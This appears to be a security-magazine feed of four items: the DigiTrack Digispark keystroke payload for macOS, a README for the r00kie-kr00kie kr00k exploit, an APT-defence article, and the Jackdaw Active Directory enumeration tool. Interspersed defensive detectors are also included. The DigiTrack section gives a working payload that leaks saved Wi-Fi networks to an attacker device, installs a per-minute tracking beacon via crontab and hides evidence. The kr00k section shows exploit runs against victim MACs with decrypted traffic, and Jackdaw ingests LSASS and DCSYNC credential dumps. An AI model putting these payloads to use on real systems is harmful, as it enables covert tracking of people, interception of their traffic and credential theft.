Channel: Hakin9 – IT Security Magazine

DigiTrack - Attacks for $5 or less using Arduino


DigiTrack - In 30 seconds, this attack can learn which networks a MacOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds. 

Now includes Hardtracker - Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple of things:

  1. Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim's data connection at any time when you are in Wi-Fi range.
  2. Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connection)
  3. Inserts a tracking job that sends the IP address and currently connected network to a Grabify link every 60 seconds.

The DigiTrack attack runs as follows: a victim leaves a MacOS computer unattended for 30 seconds, and the attacker inserts a DigiSpark board loaded with the attack payload. With delays and single keystrokes removed, the payload looks like this:

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");
  • We add the network "Sneakernet" to our trusted network list and connect to it.
DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H \"Content-Type: text/plain\" --data \"$(networksetup -listpreferredwirelessnetworks en0)\" 192.168.4.1 &");
  • After connecting, we send a curl request listing every network the MacOS computer has connected to in the past to the ESP8266 that is creating the "Sneakernet" network. The & puts the process in the background in case it takes too long, and -m 10 sets a 10-second timeout so the request cannot hang. Now we know which Wi-Fi networks the victim has joined, and which networks will make the computer connect automatically without asking.
DigiKeyboard.print("export VISUAL=nano; crontab -e");
  • We open the crontab to create a job that will execute every 60 seconds.
DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer \"$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')\" https://grabi/YOURLINK");
  • We suppress curl's output and grab the name of the currently connected Wi-Fi network. We send this along with a curl request to a tracking URL, delivering the target's IP address and currently connected Wi-Fi network every 60 seconds.
DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");
  • Finally, we wait for all background processes to finish, and kill the shit out of the terminal window to hide the evidence.

Total run time is about 30 seconds, not including the few seconds the Digispark waits for a sketch to upload.

Notes: Grabify may go into "I'm under attack" mode and refuse the check-in. Look for this line in the response: div class="cf-browser-verification cf-im-under-attack"

If you see it, the IP address is being blocked by Cloudflare.
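
The persistence this attack leaves behind is a crontab entry, so that is where a defender can look for it. The following is an added example, not code from the DigiTrack project: a Python audit that parses crontab text (a constructed sample is embedded, with a placeholder tracker URL) and flags entries that run every minute, fetch an external URL, read Wi-Fi state through networksetup or the airport binary, or suppress their own output. An entry needs at least two of those traits to be reported, so a normal backup job is left alone.

```python
import re
from dataclasses import dataclass

# Full path of the macOS airport utility named in the write-up.
AIRPORT_BIN = ("/System/Library/PrivateFrameworks/Apple80211.framework"
               "/Versions/Current/Resources/airport")

# Constructed sample crontab (not from a real host): a benign backup job, a
# beacon job shaped like the DigiTrack one with a placeholder tracker URL,
# and a benign half-hourly metrics job.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://tracker.example/PLACEHOLDER
*/30 * * * * /usr/bin/python3 /opt/metrics/push.py
"""

# Five schedule fields followed by the command.
CRON_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.*)$")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list


def audit_crontab(text, min_reasons=2):
    """Parse crontab text and return entries that show at least `min_reasons`
    beacon-like traits. Comments, blank lines and VAR=value lines are skipped."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        schedule, command = m.groups()
        reasons = []
        if schedule.split() == ["*"] * 5:
            reasons.append("runs every minute")
        if re.search(r"\b(curl|wget)\b", command) and re.search(r"https?://", command):
            reasons.append("fetches an external URL")
        if AIRPORT_BIN in command or "networksetup" in command:
            reasons.append("reads Wi-Fi state")
        if "--silent" in command or "/dev/null" in command:
            reasons.append("suppresses its own output")
        if len(reasons) >= min_reasons:
            findings.append(Finding(no, schedule, command, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print("line %d [%s]: %s" % (f.line_no, ", ".join(f.reasons), f.command[:60]))
```

Feed it the output of crontab -l for each local user. The first payload line leaves a second artifact that this script does not cover: an unfamiliar network at the top of the preferred-network list (networksetup -listpreferredwirelessnetworks en0), which is worth reviewing on the same machine.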

The post DigiTrack - Attacks for $5 or less using Arduino appeared first on Hakin9 - IT Security Magazine.


r00kie-kr00kie: PoC exploit for the CVE-2019-15126 kr00k vulnerability


r00kie-kr00kie is a PoC exploit for the CVE-2019-15126 kr00k vulnerability.

This project is intended for educational purposes only and cannot be used for law violations or personal gain. The author of this project is not responsible for any possible harm caused by the materials.

Requirements

To use these scripts, you will need a WiFi card supporting active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n), which we used to develop and test the code. We have tested this PoC on Kali Linux.

Installation

# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt

How to use

Script: r00kie-kr00kie.py

This is the main exploit file that implements the kr00k attack.

->~:python3 r00kie-kr00kie.py -h

usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
                         [-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
                         [-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Set wireless interface name for listen packets
  -l CHANNEL, --channel CHANNEL
                        Set channel for wireless interface (default: 1)
  -b BSSID, --bssid BSSID
                        Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
  -c CLIENT, --client CLIENT
                        Set WiFi client MAC address (example:
                        "01:23:45:67:89:0b")
  -n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
                        Set number of deauth packets for one iteration
                        (default: 5)
  -d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
                        Set delay between sending deauth packets (default: 5)
  -p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
                        Set path to PCAP file for read encrypted packets
  -r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
                        Set path to PCAP file for write decrypted packets
  -q, --quiet           Minimal output

In order to start an attack, you need to know the BSSID of the access point, its channel, and the MAC address of the victim client. You can find them with the airodump-ng utility (airodump-ng wlan0).

Run the exploit:

->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

      /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$
     | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/
     | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
     | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
     | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
     | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
     | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
     |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/



 /$$                  /$$$$$$   /$$$$$$  /$$       /$$
| $$                 /$$$_  $$ /$$$_  $$| $$      |__/
| $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
| $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
| $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
| $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
|__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/
                                                          v0.0.1

                    https://hexway.io/research/r00kie-kr00kie/

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 30074
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xcce1
     src       = 192.168.43.161
     dst       = 8.8.4.4
     \options   \
###[ UDP ]###
        sport     = 60744
        dport     = domain
        len       = 40
        chksum    = 0xa649
###[ DNS ]###
           id        = 55281
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]###
            |  qname     = 'g.whatsapp.net.'
            |  qtype     = A
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 30075
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xcce0
     src       = 192.168.43.161
     dst       = 8.8.4.4
     \options   \
###[ UDP ]###
        sport     = 60744
        dport     = domain
        len       = 40
        chksum    = 0x104b
###[ DNS ]###
           id        = 28117
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]###
            |  qname     = 'g.whatsapp.net.'
            |  qtype     = AAAA
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None

Also, if you have already intercepted traffic (a pcap file) after the kr00k attack, you can decrypt it:

->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

      /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$
     | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/
     | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
     | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
     | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
     | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
     | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
     |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/



 /$$                  /$$$$$$   /$$$$$$  /$$       /$$
| $$                 /$$$_  $$ /$$$_  $$| $$      |__/
| $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
| $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
| $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
| $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
|__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/
                                                          v0.0.1

                    https://hexway.io/research/r00kie-kr00kie/

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 490
     id        = 756
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0xd0ca
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 34789
        dport     = 1337
        seq       = 3463744441
        ack       = 3909086929
        dataofs   = 8
        reserved  = 0
        flags     = PA
        window    = 1369
        chksum    = 0x65ee
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
           load      = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 42533
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x2f47
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 34792
        dport     = 1337
        seq       = 71773087
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65535
        chksum    = 0x97df
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 1460
     id        = 35150
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x46a6
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 36020
        dport     = 1337
        seq       = 395101552
        ack       = 1111748198
        dataofs   = 8
        reserved  = 0
        flags     = A
        window    = 1369
        chksum    = 0x35d2
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
           load      = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 17897
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x8f83
     src       = 192.168.43.161
     dst       = 95.85.25.177
     \options   \
###[ TCP ]###
        sport     = 36266
        dport     = 1337
        seq       = 3375779416
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65535
        chksum    = 0x2c7d
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]

[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap
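
The run above opens with three rounds of five deauthentication frames, which is also what a wireless IDS sees from the defender's side. The following is an added example and not part of r00kie-kr00kie: a Python sliding-window detector over constructed 802.11 frame records (timestamp, transmitter, receiver, management subtype; the addresses reuse the BSSID and client MAC from the run above) that raises one alert per (AP, client) pair once more than a threshold of deauth/disassoc frames arrives inside a 30-second window.

```python
from collections import defaultdict, deque

# 802.11 management frame subtypes (frame type 0).
DISASSOC_SUBTYPE = 10
DEAUTH_SUBTYPE = 12

AP = "d4:38:9c:82:23:7a"       # BSSID from the run above
VICTIM = "88:c9:d0:fb:88:d1"   # client MAC from the run above

# Constructed frame records (timestamp_s, transmitter, receiver, subtype):
# three rounds of five deauth frames five seconds apart, plus one isolated
# deauth to a different client as the kind of event that should not alert.
SAMPLE_FRAMES = (
    [(0.0 + i * 0.01, AP, VICTIM, DEAUTH_SUBTYPE) for i in range(5)]
    + [(5.0 + i * 0.01, AP, VICTIM, DEAUTH_SUBTYPE) for i in range(5)]
    + [(10.0 + i * 0.01, AP, VICTIM, DEAUTH_SUBTYPE) for i in range(5)]
    + [(7.0, AP, "aa:bb:cc:dd:ee:01", DEAUTH_SUBTYPE)]
)


def detect_deauth_flood(frames, threshold=4, window_s=30.0):
    """Return one alert per (transmitter, receiver) pair as soon as more than
    `threshold` deauth/disassoc frames for that pair fall inside any
    `window_s`-second window. Input order does not matter; frames are sorted."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, tx, rx, subtype in sorted(frames):
        if subtype not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        key = (tx, rx)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop frames older than the window
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "bssid": tx,
                "client": rx,
                "count": len(q),
                "first_seen": q[0],
                "last_seen": ts,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_FRAMES):
        print("deauth flood: %s -> %s, %d frames in %.2fs"
              % (a["bssid"], a["client"], a["count"], a["last_seen"] - a["first_seen"]))
```

In a live deployment the tuples would come from a monitor-mode capture (for example Scapy's Dot11Deauth and Dot11Disas layers). Two mitigations apply here: 802.11w protected management frames let a client reject forged deauthentication frames, and the kr00k flaw itself, encrypting the frames still buffered after a disassociation with an all-zero key, is closed by the firmware and driver updates vendors issued for CVE-2019-15126.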

Script: traffic_generator.py

This script generates UDP traffic from the victim to demonstrate the kr00k attack.

->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
 Press Ctrl+C to exit


How to Prevent and Detect APT Attacks by Gilad David Maayan


An advanced persistent threat (APT) is a cyberattack that is executed by an organized group of skilled actors. These attacks are carefully planned and conducted against strategic targets and extend over a prolonged period. Often, these attacks are sponsored by nation-states or criminal organizations. In this article, you will learn about the six stages of APT attacks, how to detect APTs, and how to prevent APTs.

What Is an Advanced Persistent Threat?

APTs are typically carried out as multi-staged, compound attacks. These attacks employ a variety of techniques and numerous attack vectors, including zero-day attacks, lateral movement, credential theft, and malware. Often, APTs use multiple simultaneous attacks to obscure successful breaches. 

The goals of APT attackers typically include:

  • Theft of classified data, intellectual property, or personally identifiable information (PII)
  • Sabotage, including deletion or manipulation of data
  • Takeover or abuse of resources
  • Reconnaissance for future attacks
  • Administrative credential theft or creation

APT Attack Stages

APT attacks occur in multiple stages that vary in length depending on the lifecycle of the attack. These stages include:

  1. Initial access

APT attacks begin when attackers gain initial access. This is accomplished through compromised users, network connections, or web-based systems. Access is gained through methods such as exploitation of system vulnerabilities, spear phishing of privileged credentials, malicious uploads, or misconfigurations in security tooling.

  2. Deploy malware and secure access

Once access is gained, it is secured via the installation of backdoor shells, trojans, creation of credentials, or other malware. Whichever method is used, the purpose is to create both inbound and outbound access to a command and control center.

  3. Move laterally and expand access

After access is secured, attackers focus on increasing that access and moving laterally through your networks. This is accomplished using information gained in the initial steps or by brute forcing or exploiting vulnerabilities from within your systems. Often, attackers create additional backdoors or tunnels to further secure and expand access.

  4. Stage the attack

Eventually, attackers have enough knowledge and access to your systems to identify their objective data or processes. At this point, they begin preparing data for exfiltration, implementing control measures, or modifying systems and data.

  5. Attack execution

After preparations are complete, criminals execute their attack. This is frequently done under the cover of another attack, such as a distributed denial of service (DDoS) attack. This distracts security teams and enables attackers to exfiltrate data or make system changes without detection. It also provides attackers cover to remove traces of the attack, increasing the chance that access can be regained and preventing prosecution or tracing.

  6. Follow-up attacks

Frequently, APTs persist after an initial attack in the hope of gaining greater access or additional data. If not detected during the execution stage, attackers can continue using their secured access routes and gain the opportunity to bypass new or updated controls that you might institute.

How to Detect APTs

Detecting APTs can be a challenge. Attackers are well prepared and often use more advanced measures than standard attacks. However, detection is not impossible. The following tools can help you detect attackers and any damage they may cause. 

User and entity behavior analytics (UEBA)

UEBA is an essential tool for detecting and tracing APTs. This method doesn’t rely on attack signatures and enables you to detect attacks of almost any type. 

It uses artificial intelligence (AI) and machine learning (ML) to collect and analyze network events. From these analyses, UEBA tools create baselines of “normal” behavior against which new events are measured. If an event falls outside the expected range of behavior, security teams are alerted or defenses are deployed. 
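
The baseline-and-deviation idea can be shown concretely. The following is an added example, not from the article: a Python sketch that builds a per-user baseline (usual login hours, known source hosts, and the mean and standard deviation of daily login volume) from two weeks of constructed authentication events, then scores new events and alerts when at least two independent signals deviate at once. The events, the two-signal rule and the thresholds are this example's choices.

```python
import statistics
from collections import defaultdict

# Constructed authentication events (user, day, hour, source_host); not real logs.
# Two weeks of routine logins form the baseline.
BASELINE_EVENTS = (
    [("alice", day, hour, "wks-alice") for day in range(1, 15) for hour in (8, 9, 13, 17)]
    + [("bob", day, hour, "wks-bob") for day in range(1, 15) for hour in (9, 10)]
)

# Day 15: mostly routine, plus one login from a new host at 03:00.
NEW_EVENTS = [
    ("alice", 15, 9, "wks-alice"),
    ("alice", 15, 3, "fileserver-02"),
    ("bob", 15, 10, "wks-bob"),
    ("bob", 15, 10, "dc01"),
]


def build_baseline(events):
    """Per user: usual hours, known source hosts, and the mean / population
    standard deviation of logins per day."""
    per_day = defaultdict(lambda: defaultdict(int))
    hours = defaultdict(set)
    hosts = defaultdict(set)
    for user, day, hour, host in events:
        per_day[user][day] += 1
        hours[user].add(hour)
        hosts[user].add(host)
    baseline = {}
    for user, days in per_day.items():
        counts = list(days.values())
        baseline[user] = {
            "mean": statistics.mean(counts),
            "stdev": statistics.pstdev(counts),
            "hours": hours[user],
            "hosts": hosts[user],
        }
    return baseline


def score_events(baseline, events, min_signals=2, z_limit=3.0):
    """Return (user, day, hour, host, reasons) for events where at least
    `min_signals` independent deviations from the user's baseline coincide."""
    daily = defaultdict(int)
    for user, day, _, _ in events:
        daily[(user, day)] += 1
    alerts = []
    for user, day, hour, host in events:
        b = baseline.get(user)
        reasons = []
        if b is None:
            reasons += ["unknown user", "no baseline"]
        else:
            if host not in b["hosts"]:
                reasons.append("new source host %s" % host)
            if hour not in b["hours"]:
                reasons.append("unusual hour %02d:00" % hour)
            volume = daily[(user, day)]
            if b["stdev"] > 0:
                spike = (volume - b["mean"]) / b["stdev"] > z_limit
            else:                      # constant history: fall back to a ratio
                spike = volume > 2 * b["mean"]
            if spike:
                reasons.append("login volume %d vs mean %.1f" % (volume, b["mean"]))
        if len(reasons) >= min_signals:
            alerts.append((user, day, hour, host, reasons))
    return alerts


if __name__ == "__main__":
    for user, day, hour, host, reasons in score_events(build_baseline(BASELINE_EVENTS), NEW_EVENTS):
        print("ALERT %s day %d %02d:00 from %s: %s" % (user, day, hour, host, "; ".join(reasons)))
```

Requiring two coinciding signals is what keeps bob's single new host from alerting on its own; in a real UEBA product the features are far richer and the weighting is learned rather than fixed, but the baseline-then-deviation shape is the same.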

Deception technology

Deception technology uses traps baited with appealing, but fake, data and access. These traps serve no legitimate purpose and provide a near 100% positive alert rate. When attackers are attempting to enter or are traversing your network, they are lured to these traps. As long as traps are well designed, attackers may never know that they have been tricked. Meanwhile, you can observe and track their movements and activities and limit their access. 

Network monitoring

While network monitoring isn’t as novel as UEBA or deception technology, it forms the base of APT detection. Without monitoring, you cannot collect network information or determine the source of attacks. To be effective, this monitoring needs to cover the entirety of your network, including all endpoints and connected systems.

How to Prevent APTs

While detecting APT attacks is key, preventing attacks is ideal. To increase your chances of successfully preventing attacks, consider adopting the following practices.

Perform penetration testing

Penetration testing can help you uncover unknown vulnerabilities and test the effectiveness of your implemented tools. It enables you to mimic the actions and methods that attackers might use and can provide immediate feedback on how you can improve systems. 

You can perform penetration testing internally, with red (attack) and blue (defense) teams or with a third-party service. Alternatively, you might institute a bug bounty program. These programs encourage independent security testers to try and infiltrate your systems and report any vulnerabilities they may find.

Educate your employees

One of the most common methods of gaining system access is through the use of compromised credentials. These credentials may be stolen through phishing campaigns, false log-in portals, or brute force. Weak password controls also put credentials at risk.

To avoid these liabilities, you need to train your employees to recognize and avoid tactics used for credential theft, for example how to recognize and report spam emails. You should also educate your users on how to create strong passwords and why it's important not to reuse or share credential information.

Keep your systems updated

A common tactic used to gain or expand access in APTs is the exploitation of existing vulnerabilities, in particular known vulnerabilities that have not been patched. By making sure that your systems remain up to date you can eliminate these vulnerabilities as points of entry.

To ensure that you remain aware of current updates and to verify that your systems are fully patched, you need to monitor your versions. The easiest way to do this is with a software composition analysis (SCA) solution. These solutions can help inventory your systems, identify the components you’re using, monitor for vulnerability announcements or patch releases, and alert you when components are out of date. 

Limit system access

The most effective way to limit system access is by applying defense-in-depth (DiD) and the principle of least privilege. DiD involves securing your systems throughout, as opposed to just on the perimeter. This includes the use of internal firewalls and internal traffic filtering. 

The principle of least privilege complements DiD by specifying that users and applications should be given only the minimum amount of required access. In combination, these strategies can help limit an attacker’s ability to traverse your networks. The combination can also significantly slow down access, giving you more time to detect and halt an attack. 

Conclusion

APTs are long-term attacks typically carried out in six stages: initial access, malware deployment, lateral movement, attack setup, attack launch, and then follow-up attacks. You can detect APTs by using tools like UEBA, deception technology, and network monitoring. You can prevent APTs by performing penetration testing, educating employees on proper cyber security standards, limiting access to systems, and keeping your systems updated.


About the Author: 

Gilad David Maayan is a technology writer who has worked with over 150 technology companies including SAP, Samsung NEXT, NetApp and Imperva, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership.


LinkedIn: https://www.linkedin.com/in/giladdavidmaayan/



Jackdaw - Tool To Collect All Information In Your Domain


Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.

Example commands of Jackdaw

Most of these commands are already available from the web API, except for the database init.

DB init

jackdaw --sql sqlite:///<full path here>/test.db dbinit

Enumeration

Full enumeration with integrated sspi - windows only

jackdaw --sql sqlite:///test.db enum 'ldap+sspi://10.10.10.2' 'smb+sspi-ntlm://10.10.10.2'

Full enumeration with username and password - platform-independent

The password is Passw0rd!
jackdaw --sql sqlite:///test.db enum 'ldap://TEST\victim:Passw0rd!@10.10.10.2' 'smb+ntlm-password://TEST\victim:Passw0rd!@10.10.10.2'

LDAP-only enumeration with username and password - platform-independent

The password is Passw0rd!
jackdaw --sql sqlite:///test.db ldap 'ldap://TEST\victim:Passw0rd!@10.10.10.2'

Start an interactive web interface to plot graph and access additional features

jackdaw --sql sqlite:///<FULL PATH TO DB> nest

Open http://127.0.0.1:5000/ui for the API

Please see the Building the UI section further down to learn how to build the UI. Once built:

Open http://127.0.0.1:5000/nest for the graph interface (shows the graph, but far from working)

Features

Data acquisition

via LDAP

The LDAP enumeration phase acquires data on AD info, User, Machine, OU and Group objects, each of which is represented as a node in the graph and as a separate table in the DB. Additionally, the Security Descriptor of every aforementioned object is parsed and the ACEs of its DACL are added to the DB. This, together with the membership information, is represented as edges in the graph. Custom SQL queries can also be performed on any of the aforementioned data types when needed.

via SMB

The SMB enumeration phase acquires data on shares, local groups, sessions and NTLM data by connecting to each machine in the domain (the machine list is acquired via LDAP).

via LSASS dumps (optional)

The framework allows users to upload LSASS memory dumps to store credentials and extend the session information table. Both will be used as additional edges in the graph (shared password and session respectively). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via DCSYNC results (optional)

The framework allows users to upload impacket's DCSYNC files to store credentials. This is used as additional edges in the graph (shared password). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via manual upload (optional)

The framework allows manually extending the available DB in every aspect. Example: when user-session information on a given computer is discovered outside of the automatic enumeration, these sessions can be uploaded manually, which populates the DB and therefore the resulting graph.

Graph

